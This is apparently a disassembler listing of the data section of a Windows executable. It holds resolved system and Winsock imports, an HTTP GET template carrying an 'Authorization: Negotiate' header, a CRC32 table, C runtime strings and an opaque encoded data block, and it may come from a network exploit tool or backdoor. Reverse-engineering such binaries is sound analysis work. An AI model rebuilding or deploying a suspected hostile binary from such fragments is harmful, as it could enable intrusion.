dword_41C0B0 dd 3A7574h ; sub_414942+15�r ...
dword_41C0B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA dd 7C82F7A0h
dword_41C0BC dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlockdword_41C0C0 dd 7C80FF19h ; resolved to->KERNEL32.GlobalLock dd 7C80B974h, 7C80B905h, 7C80945Ch, 7C831CB8h, 7C831C45h
dd 7C802367h, 7C8329D9h, 7C812782h, 7C810D87h, 7C835DCAh
dword_41C0EC dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; seg000:0040F8C2�r
dd 7C8310F2h, 7C814EEAh
dword_41C0F8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_4089FD+16F�r ...
dd 7C831EABh, 7C8309E1h, 7C809920h
dword_41C108 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA dd 7C802520h, 7C80E93Fh, 7C81CE03h, 7C835E8Fh
dword_41C11C dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; seg000:00416DA1�r ...
dword_41C120 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_4128E9+54�r ...
dd 7C8216A4h, 7C80DDF5h, 7C801E16h
dword_41C130 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_41C134 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_41237F+AF�r ...
dword_41C138 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_41357B+2C4�r ...
dword_41C13C dd 7C937A40h ; resolved to->NTDLL.RtlUnwind dd 7C8350BFh, 7C80176Bh
dword_41C148 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_413BAF+28�r
dd 7C801EEEh, 7C812F1Dh
dword_41C154 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_41C158 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_41C15C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_41C160 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_41C164 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_413C60+51�r
dd 7C809E79h
dword_41C16C dd 7C812A09h ; resolved to->KERNEL32.RaiseException ; sub_41B0FB+2E�r
dword_41C170 dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeap dd 7C838DE8h
dword_41C178 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; seg000:00416CE1�r ...
dd 7C812E76h, 7C809915h, 7C8127A7h
dword_41C188 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilter dd 7C81DF77h, 0
dword_41C194 dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_40380D+8E�r
dword_41C198 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_403790+15�r
dword_41C19C dd 71AB3EA1h ; resolved to->WS2_32.setsockoptdword_41C1A0 dd 71AB4519h ; resolved to->WS2_32.ioctlsocketdword_41C1A4 dd 71AB3E00h ; resolved to->WS2_32.binddword_41C1A8 dd 71AB88D3h ; resolved to->WS2_32.listendword_41C1AC dd 71AC1028h ; resolved to->WS2_32.acceptdword_41C1B0 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_40318D+115�r
dword_41C1B4 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_41C1B8 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_41C1BC dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_403790+41�r
dword_41C1C0 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_40318D+74�r ...
dword_41C1C4 dd 71AB406Ah ; resolved to->WS2_32.connectdword_41C1C8 dd 71AB615Ah ; resolved to->WS2_32.recvdword_41C1CC dd 71AB428Ah ; resolved to->WS2_32.send ; sub_40318D+E4�r ...
dword_41C1D0 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_403790+68�r ...
align 8
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402AD2+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 8
dbl_41C218 dq 1.388888888888889e-2 ; DATA XREF: sub_4028E4+2F�r
dbl_41C220 dq 1.666666666666667e-1 ; DATA XREF: sub_4028E4+15�r
dword_41C228 dd 0FFFFFFFFh ; sub_402DA4�r ...
align 10h
dbl_41C230 dq 1.333333333333333 ; DATA XREF: sub_402930+79�r
dword_41C238 dd 0 ; sub_402E54+5B�o ...
dword_41C23C dd 0 dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dd 2 dup(0)
byte_41C644 db 0 ; DATA XREF: sub_412C3C+4A�r
align 2
dw 3F50h
dbl_41C648 dq -3.0517578125e-5 ; DATA XREF: sub_40F6B3+1E�r
dbl_41C650 dq 1.0 ; DATA XREF: sub_410CB2+6C�r
; sub_410DFB+6C�r ...
dword_41C658 dd 0FFFFFFFFh, 412ABFh, 412AD3hbyte_41C664 db 6 ; DATA XREF: sub_412C3C:loc_412C93�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8, 6E0028h, 6C0075h, 29006Ch, 0
dd 6C756E28h, 296Ch, 6E795Fh, 31795Fh, 30795Fh, 78657266h
dd 70h, 646F6D66h, 0
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 10h
aAtan2 db 'atan2',0
align 4
aAtan db 'atan',0
align 10h
aAcos db 'acos',0
align 4
aAsin db 'asin',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
aLog10 db 'log10',0
align 10h
aLog db 'log',0
aPow db 'pow',0
aExp db 'exp',0
align 10h
dbl_41C790 dq 0.0 ; DATA XREF: sub_4143EF+8C�r
; sub_4143EF+AC�r ...
dbl_41C798 dq 4.195835e6 ; DATA XREF: sub_414904+F�r
dbl_41C7A0 dq 3.145727e6 ; DATA XREF: sub_414904+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_414942+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_414942�o
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_414A69+93�o
align 4
dword_41C7D8 dd 0FFFFFFFFh, 415154h, 41515Eh, 0dword_41C7E8 dd 0FFFFFFFFh, 0 dd offset loc_4152DA
align 8
dd offset sub_4152B8
; ---------------------------------------------------------------------------
retn 4152h
; ---------------------------------------------------------------------------
align 10h
dword_41C800 dd 0FFFFFFFFh, 41550Ah, 41550Eh, 0dword_41C810 dd 0FFFFFFFFh, 41556Ch, 415575h, 0dword_41C820 dd 0FFFFFFFFh, 0 dd offset loc_41563D
align 10h
dd offset loc_415629
dd offset loc_41562D
dword_41C838 dd 0FFFFFFFFh, 0 dd offset loc_415693
align 8
dd offset loc_41567F
dd offset loc_415683
dword_41C850 dd 2 dup(0) ; seg000:0041811D�o ...
dword_41C858 dd 0FFFFFFFFh, 416CA4h, 416CA8h, 0FFFFFFFFh, 416D58h, 416D5Ch
; DATA XREF: seg000:00416B99�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_417C59+119�o
align 10h
asc_41CB20 db 0Ah ; DATA XREF: sub_417C59+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_417C59+D3�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_417C59+BF�o
aProgramNameUnk db '<program name unknown>',0
align 10h
dword_41CB60 dd 0FFFFFFFFh, 4181DDh, 4181E1haSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: seg000:00418B8C�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_4195E1+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_4195E1+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_4195E1+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_419DB1:loc_419EA6�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_419DB1+D8�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_419DB1+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_419DB1+AD�o
align 10h
dword_41CC00 dd 0FFFFFFFFh, 41A8EFh, 41A8F3h, 0FFFFFFFFh, 41A95Eh, 41A962h
; DATA XREF: seg000:0041A73D�o
dd 41CD20h
off_41CC1C dd offset loc_41AE98 ; DATA XREF: sub_41ACA0+4D�o
; sub_41AEB4+C�o
dd offset sub_41AD5E
dd offset sub_41AE7B
aStringTooLong db 'string too long',0 ; DATA XREF: sub_41ACA0+1E�o
dd offset dword_41CD58
off_41CC3C dd offset loc_41ADC5 ; DATA XREF: sub_41ACFA+4E�o
; sub_41AD88+11�o ...
dd offset sub_41AD5E
dd offset sub_41AD6B
dd offset dword_41CDA8
off_41CC4C dd offset loc_41AF80 ; DATA XREF: sub_41AECC+4D�o
; sub_41AF9C+C�o
dd offset sub_41AD5E
dd offset sub_41AF63
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_41AECC+1E�o
dd offset dword_41CDD8
off_41CC74 dd offset sub_41B004 ; DATA XREF: sub_41B020+8�o
; sub_41B05D+8�o ...
dd offset sub_41B0BD
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_41B0BD+7�o
align 10h
dd offset dword_41CE20
off_41CC94 dd offset loc_41B0DF ; DATA XREF: sub_41B0CA�o
dword_41CC98 dd 0E06D7363h, 1, 2 dup(0) dd 3, 19930520h, 2 dup(0)
off_41CCB8 dd offset dword_42EF20 ; DATA XREF: seg001:0041CD08�o
; seg001:0041CD3C�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_41CCD0 dd offset dword_42EF38 ; DATA XREF: seg001:0041CD04�o
; seg001:0041CD38�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_41CCE8 dd offset dword_42EF58 ; DATA XREF: seg001:0041CD00�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41CCE8
dd offset off_41CCD0
dd offset off_41CCB8
dword_41CD0C dd 3 dup(0) dd 3, 41CD00h, 3 dup(0)
dd offset dword_42EF58
dd offset dword_41CD0C+4
align 8
dd offset off_41CCD0
dd offset off_41CCB8
dword_41CD40 dd 4 dup(0) dd 2, 41CD38h
dword_41CD58 dd 3 dup(0) dd offset dword_42EF38
dd offset dword_41CD40+8
align 10h
off_41CD70 dd offset dword_42EF78 ; DATA XREF: seg001:0041CD88�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41CD70
dd offset off_41CCD0
dd offset off_41CCB8
dd 0
db 0 ; DATA XREF: seg001:0041CDB8�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 41CD88h
dword_41CDA8 dd 3 dup(0) dd offset dword_42EF78
dd offset unk_41CD98
dd offset off_41CCB8
dword_41CDC0 dd 4 dup(0) dd 1, 41CDBCh
dword_41CDD8 dd 3 dup(0) dd offset dword_42EF20
dd offset dword_41CDC0+8
align 10h
off_41CDF0 dd offset dword_42EF98 ; DATA XREF: seg001:0041CE08�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_41CDF0
dword_41CE0C dd 3 dup(0) dd 1, 41CE08h
dword_41CE20 dd 3 dup(0) dd offset dword_42EF98
dd offset dword_41CE0C+4
align 8
dword_41CE38 dd 19930520h, 2, 41CE58h, 5 dup(0) dd 0FFFFFFFFh, 41B140h, 0
dd offset sub_41B138
dword_41CE68 dd 19930520h, 2, 41CE88h, 5 dup(0) dd 0FFFFFFFFh, 41B164h, 0
dd offset loc_41B16C
dword_41CE98 dd 19930520h, 2, 41CEB8h, 1, 41CEC8h, 3 dup(0)
; DATA XREF: seg000:loc_41B180�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 41CEE0h, 4 dup(0)
dd offset loc_4030BE
dd 0
dd offset dword_42EF20
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 41B05Dh, 2 dup(0)
dd offset dword_42EF38
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 41ADE1h, 2 dup(0)
dd offset dword_42EF58
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 41AEB4h, 0
dword_41CF50 dd 3, 41CF30h, 41CF10h, 41CEF0hdword_41CF60 dd 0 ; sub_41AE7B+12�o
dd offset sub_41AE3E
dd 0
dd offset dword_41CF50
dword_41CF70 dd 19930520h, 1, 41CF90h, 5 dup(0) dd 0FFFFFFFFh, 41B18Ch
dword_41CF98 dd 19930520h, 1, 41CFB8h, 5 dup(0)dword_41CFB8 dd 0FFFFFFFFh, 41B1A0h, 2, 41CF10h, 41CEF0h, 0dword_41CFD0 dd 0 dd offset sub_41AD88
dd 0
dd offset dword_41CFB8+8
dword_41CFE0 dd 19930520h, 1, 41D000h, 5 dup(0) dd 0FFFFFFFFh, 41B1B4h
dword_41D008 dd 19930520h, 1, 41D028h, 5 dup(0) dd 0FFFFFFFFh, 41B1C8h
dword_41D030 dd 19930520h, 1, 41D050h, 5 dup(0) dd 0FFFFFFFFh, 41B1DCh, 0
dd offset dword_42EF78
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 41AF9Ch, 0
dword_41D078 dd 3, 41D058h, 41CF10h, 41CEF0hdword_41D088 dd 0 ; sub_41AF63+12�o
dd offset sub_41AF26
dd 0
dd offset dword_41D078
dword_41D098 dd 19930520h, 1, 41D0B8h, 5 dup(0) dd 0FFFFFFFFh, 41B1F0h
dword_41D0C0 dd 19930520h, 1, 41D0E0h, 5 dup(0) dd 0FFFFFFFFh, 41B204h, 1D2B8h, 2 dup(0)
dd 1D2FCh, 1C194h, 1D124h, 2 dup(0)
dd 1DA1Ah, 1C000h, 5 dup(0)
dd 0B4E94F73h, 226E7F15h, 389159C5h, 0A65821F4h, 7E14D5C6h
dd 585EC416h, 7B718AF8h, 930F280Eh, 0B17C7B0Eh, 0BB87CE18h
dd 1B88BA66h, 3A9638BCh, 17CBFE63h, 83178701h, 0C8A56CE6h
dd 0E2898E6Dh, 0B63CF79Ah, 0A41FE5AFh, 0E7A25CBFh, 0ABB8E224h
dd 0B2E39DD8h, 82F87C28h, 0D021FAC1h, 0B7E7EA81h, 3F23AAE5h
dd 37D76EC0h, 0DFA7DB58h, 61214CFh, 0AA72259Ah, 7E755FE1h
dd 6782B227h, 0E4C8A4Fh, 5844D848h, 7D625680h, 0E73B90D1h
dd 0F1F515B8h, 8FBFE375h, 7599F058h, 0B308BBFAh, 0D6AA9373h
dd 77E50073h, 0C1A38A3Bh, 67258B79h, 4BA5B0E1h, 0BB2118D3h
dd 6ECEC90Ch, 0B1BEBB69h, 291B9474h, 0C79D1203h, 57DFCCFDh
dd 0AEBA5901h, 0D7F0149Eh, 0B3A81263h, 0F0209555h, 3AEEAD82h
dd 6F29BBDEh, 879CBF24h, 0CB107080h, 914EFB02h, 83A87C02h
dd 9E61822h, 4F9619F1h, 0C3B8353h, 98292B51h, 878BABBDh
dd 8CC85E70h, 0A6ABE91h, 48B5C2F1h, 44F0DB9Bh, 726F19A1h
dd 0D6820579h, 3A728413h, 0AEE44D29h, 23DF95B3h, 2DD178E9h
dd 0AA5D9A97h, 245B8B70h, 33114E17h, 1603F486h, 0B5602F4Ah
dd 836F1ED8h, 25472ACBh, 56C585A8h, 517DC4CEh, 4172821Bh
dd 9F4EA83Dh, 60D4A1FAh, 393AC44Fh, 0D168CC29h, 3145CA70h
dd 0AB8A4DC2h, 0B5CFADDCh, 17E543C0h, 52931967h, 9F2F2C4Ah
dd 0DD881AAFh, 2EF09775h, 0AAA84AA8h, 0CAB57102h, 0BCD88A4Bh
dd 0
dd 19DB7892h, 54DEC69Eh, 0B3C4E631h, 4A251936h, 4EAF1DEBh
dd 0A4538EEh, 0FC5A1235h, 0F880CA26h, 4160F604h, 0E58B614Eh
dd 0F4D5B3F1h, 21376B4Ch, 1066C266h, 65956DEEh, 371350CFh
dd 90BC916Fh, 0
dd 0EF8A03BCh, 0FDB9E29Fh, 7F8h, 0D00E007Eh, 0CC25C1C7h
dd 5C6A3CEDh, 16D0000h, 40526980h, 5864230h, 0AE7CAC03h
dd 2060000h, 1FC89BFh, 2BFD6FFDh, 9266B254h, 0E34AC3F5h
dd 0D17F459h, 0BE22E8h, 0C14A0207h, 0CC7AA183h, 861C25Bh
dd 70B01F4Ah, 70D26B92h, 31171EB9h, 89AF34h, 1B440296h
dd 0D124F0h, 6D000124h, 90932F03h, 17784A40h, 3908C1F7h
dd 4578E497h, 16E0000h, 0E14A58C6h, 7B1B72B5h, 9329A4B1h
dd 0B9A7h, 934B00FBh, 0F522AE30h, 0B67B7E85h, 32331D70h
dd 11A0000h, 1AD81975h, 0EE2046CCh, 696FCAABh, 4A0000h
dd 28F46E03h, 0B20E551Bh, 0E95D8ED2h, 1B0000h, 556D03DBh
dd 0DEFA121Fh, 7ECD4Dh, 11780112h, 0E38F7FC4h, 7402B56Bh
dd 3400B4h, 66C58F41h, 23421877h, 0B04F91h, 4BF5010Dh
dd 898FC898h, 8D09DC6Dh, 44C179EDh, 0ECC3E3C2h, 900000h
dd 0E8896841h, 0BE9A069Dh, 8A0046h, 7B711FADh, 0F73C171Eh
dd 0F3A591EFh, 9A943884h, 908BD0E5h, 890000h, 0DCC7532Bh
dd 0F3DB50C2h, 0BD28A7EFh, 2903662Ch, 0E3EC581Dh, 7163F9h
dd 6AE5009Dh, 34693C8Ah, 0D7983798h, 3ED5D0h, 0EE000094h
dd 6C792961h, 6A7B0C69h, 0C026DB16h, 2180000h, 0B9D50ED1h
dd 965BEA71h, 26A0000h, 0AC2A0A62h, 0A05454FEh, 23680838h
dd 1BCEh, 906B01C1h, 4EAAA775h, 0AEE737B2h, 9E97DCB2h
dd 6E6FBC1Fh, 32Eh, 83930066h, 50966A7Ch, 235B38B0h, 6D047FD7h
dd 312EB99Fh, 3282h, 3DCF01ABh, 5875FD2h, 0B4DCAFA6h, 0F1183EC7h
dd 0D323FE8Eh, 271AC9D0h, 0BDE3895Bh, 0AD227BCEh, 6E2471DDh
dd 0B03838h, 0D00D0055h, 516C9A81h, 0FD164F2Ah, 3FA6C64Bh
dd 0AC7CA699h, 0FCDD64h, 60FD01C2h, 5411CBEh, 0EA92D2C3h
dd 6C80h, 2D56013Eh, 0A478CF95h, 0D3429EB9h, 0F80F2F0Bh
dd 1260000h, 0ABA46628h, 8C7CD38Eh, 0D4AE70B8h, 0C07CE1EBh
dd 0AF0000h, 0E59504Fh, 990DE2A0h, 0DD081A83h, 0F613h
dd 152E0193h, 7689A67Ah, 54A972E1h, 66F1h, 0A0EE018Ch
dd 0B31A064Ah, 0FDFAC186h, 2B00000h, 4B7D75A7h, 1FA350BFh
dd 6D8F78D2h, 621B22h, 159B01D6h, 0FDF33C8Ah, 0F64A848Eh
dd 0AC586Ch, 0B3B20035h, 0FBB9B690h, 2434ADCEh, 0F469540Dh
dd 38A5A8DEh, 26C0000h, 4DB07C30h, 999540ADh, 0B23EC8h
dd 0C2AF0114h, 99D18FE9h, 84CA3A4Ah, 440014h, 0BB8006DBh
dd 5D96B4DCh, 8DA58926h, 30A8h, 0ED400080h, 0AA4A014Ch
dd 2A3756D2h, 0A4F025Ah, 6AB421E2h, 0CAFB5801h, 24FA05h
dd 81DA0268h, 6D7E12FCh, 0AC9A6C73h, 0F2BAF26Dh, 0FEE1AA6Eh
dd 2DF0000h, 0D874427h, 90E5BB48h, 1650077h, 0F6BE104Ch
dd 0C51F4998h, 0EFF2E48Ah, 1750000h, 0B259903Dh, 0D63EBB40h
dd 3700726Eh, 18D0060h, 378C0EB7h, 0BC99D782h, 94B3BEBDh
dd 0A04502CEh, 81CFh, 56050159h, 0D18C1247h, 3E57A45Eh
dd 324553AAh, 0DDD731F7h, 11B0008h, 0AE3B1406h, 2B178101h
dd 83A43924h, 7D0000h, 1D7BEAF1h, 2DDC2238h, 0B40736h
dd 0DCAD0057h, 0D5181640h, 7D10B86Ch, 1EF0012h, 11EA3C8h
dd 37804A6Dh, 1692FAh, 43D200F8h, 16345C1Ch, 3C56DFC1h
dd 0AFD827D9h, 0C9F41C75h, 280025h, 73C93B77h, 0B317317Fh
dd 2CE009Ch, 0C6DF0A82h, 2FFC3CB4h, 229D99D6h, 7AFBFAB7h
dd 0B9B6F2h, 8263003Fh, 0C8844D6h, 63F79635h, 20D8h, 35DE029Fh
dd 15B1D078h, 0D7B58047h, 0C367FB71h, 1DD0054h, 0BBBC980Dh
dd 82C43F2h, 2D200C5h, 4BCFDCD5h, 0A8C1BA59h, 0EFE63ADAh
dd 7920C5ADh, 46DB0Eh, 626101E4h, 0E17B19DBh, 3D79BA5Ah
dd 0A8A46861h, 3B3C9C8Fh, 0CE0065h, 4434A5F6h, 101E77B0h
dd 8F888FDCh, 89DC9BD7h, 0F70000h, 0C20EA61Ch, 512F02C8h
dd 9D90ABFCh, 87C2962Fh, 29E0099h, 6240622Dh, 43C8509Dh
dd 51B57BD3h, 2FB13463h, 11C0000h, 29896834h, 0A0B84AD5h
dd 0F8C396D5h, 7712h, 92960199h, 0B6ABA6Bh, 5B4820h, 0A8CF019Fh
dd 61DD2165h, 368Fh, 0DA54022Fh, 0C61B40DCh, 791816h, 3E760170h
dd 92DB8C5Ch, 188D6BDDh, 0B1A4A025h, 6F50C19Dh, 0A5EE89EFh
dd 15D0000h, 11C28F1Fh, 0BF486710h, 65451280h, 1A20057h
dd 211757E9h, 0ECD238EEh, 9026AEh, 0F88A0150h, 38ADF071h
dd 8FFE1FA8h, 0B3FC4077h, 0CA0034h, 690A8DADh, 54992D06h
dd 9A43BBE1h, 0B941C7h, 762D0174h, 8B9FFBEFh, 616F8745h
dd 19D0000h, 0F77BB328h, 7B71863Ah, 3F4297h, 3C93019Bh
dd 0FA5B20B0h, 0D624C813h, 2BF0000h, 5BD98C37h, 0B7639E94h
dd 865B8Dh, 1FDD02BBh, 0E3251ADEh, 59AA2A63h, 0B361h, 742B01B8h
dd 0BA2F9524h, 38EB21ABh, 0D1A7ACh, 0E24C020Bh, 66A36671h
dd 7FEB9BD8h, 317515EFh, 1A30000h, 831D9529h, 0E0210F04h
